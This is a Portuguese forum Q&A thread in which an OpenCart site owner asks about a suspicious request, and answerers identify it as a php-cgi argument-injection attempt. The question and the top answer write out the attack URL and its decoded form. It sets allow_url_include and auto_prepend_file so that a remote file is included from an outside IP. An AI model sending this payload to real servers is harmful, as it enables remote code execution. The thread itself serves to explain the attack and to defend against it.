# Falha de segurança PHP

Tags: php, segurança

Percebi uma atividade incomum no meu site (e-commerce opencart 2.0.2.0)

este é o comando que usaram

http://www.meusite.com.br/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://49.212.157.58/policy/r.txt

não sei exatamente o que é parece explorando uma falha do php e inserindo uma backdoor tenho o código q foi ou não injetado ainda não sei aparentemente ele deletou o texto do servidor em que ele estava mas eu fiz uma copia caso alguem queira analisar me avise que eu mando.

Agora minha dúvida como saber se o ataque dele foi bem sucedido como corrigir o problema?

Comment: Esse era o arquivo que ele inseriu http://49.212.157.58/policy/r.txt, parece ser uma função PHP, você notou algum arquivo diferente?

Comment: Não é uma falha de segurança do PHP. É meramente uma ridícula tentativa de "php injection". Acontece milhares de vezes todos os  dias em todos os sites.. No seu caso, os parâmetros em si não fazem absolutamente nada.

Comment: @DanielOmine isso deve ser para "coisas antigas" do php.

Answer (score 3):

Trata-se de uma tentativa de invasão que se vale de uma [vulnerabilidade do PHP em modo CGI](https://bugs.php.net/bug.php?id=61910) onde o php-cgi recebe a *query string* como argumentos de linha de comando, permitindo que opções sejam incluídas através de URL.

Decodificando a URL você consegue ler as configurações que o invasor tentou inserir:

```
-d allow_url_include=On -d auto_prepend_file=http://49.212.157.58/policy/r.txt
```

A opção `-d` define um novo valor para uma entrada INI e se houvesse sucesso todos os aquivos PHP iriam incluir (e executar) o arquivo remoto `r.txt`, o que abre muitas possibilidades do que o invasor poderia fazer.

Answer (score 2):

Teoricamente, pelo código postado na url, tentaram fazer um ataque onde, valendo-se de uma possível habilitação de `allow_url_include` no php.ini, tentaram executar um comando via url (acho que em algumas versões anteriores do PHP havia essa falha), que faria com que o arquivo `policy/r.txt` fosse incluído em qualquer script php automaticamente.

Ou seja, se o atacante tivesse sucesso, provavelmente para você seria trágico.

Talvez o que tenha ocorrido nesse caso seja uma tentativa de um [exploit](http://canaltech.com.br/o-que-e/o-que-e/O-que-e-exploit/).

Vale lembrar que, pelo fato de tentarem invadir seu sistema, não quer dizer que os mesmos tenham obtido sucesso.